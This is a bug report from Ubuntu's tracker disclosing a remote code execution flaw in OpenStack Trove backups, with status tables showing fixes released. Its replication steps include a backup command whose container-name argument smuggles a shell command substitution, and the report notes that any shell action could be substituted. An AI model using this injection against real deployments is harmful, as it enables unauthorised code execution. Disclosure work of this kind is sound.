Remote code execution: Trove backup
| Affects | Status | Importance | Assigned to | Milestone | |
|---|---|---|---|---|---|
| openstack-trove (Ubuntu) |
Fix Released
|
High
|
Unassigned | ||
| Jammy |
Fix Released
|
High
|
Unassigned | ||
| Lunar |
Fix Released
|
High
|
Unassigned | ||
| Mantic |
Fix Released
|
High
|
Unassigned | ||
Bug Description
Note: Details taken from https:/
An external security audit by Adam Bell, CyberCX New Zealand (conducted for Catalyst Cloud) has identified a Remote Code Execution security issue in Trove.
During a Trove instance backup command, it is possible to pass through extra arguments via guestagent to docker, and utilize a subprocess shell within backup python code to perform a Remote Code Execution within the Trove backup container.
Replication steps:
1) Create mysql database instance.
2) Issue a backup command using the following: $ openstack database backup create --instance rce-db1 --swift-container 'test --db-user="$(touch /rce_successful
Validation of the RCE can be observed from within the Trove VM:
root@rce-db1:~# docker cp db_backup:
root@rce-db1:~# ls -l rce_successful.txt
-rw-r--r-- 1 root root 0 Apr 20 04:20 rce_successful.txt
The executed touch command above can be replaced with any shell actions, including apt.
| Changed in openstack-trove (Ubuntu Lunar): | |
| status: | New → Fix Released |
| Changed in openstack-trove (Ubuntu Mantic): | |
| status: | New → Fix Released |
| Changed in openstack-trove (Ubuntu Jammy): | |
| status: | New → Triaged |
| importance: | Undecided → High |
| Changed in openstack-trove (Ubuntu Lunar): | |
| importance: | Undecided → High |
| Changed in openstack-trove (Ubuntu Mantic): | |
| importance: | Undecided → High |
| Marc Deslauriers (mdeslaur) wrote | #1 |
| Changed in openstack-trove (Ubuntu Jammy): | |
| status: | Triaged → Fix Released |
https:/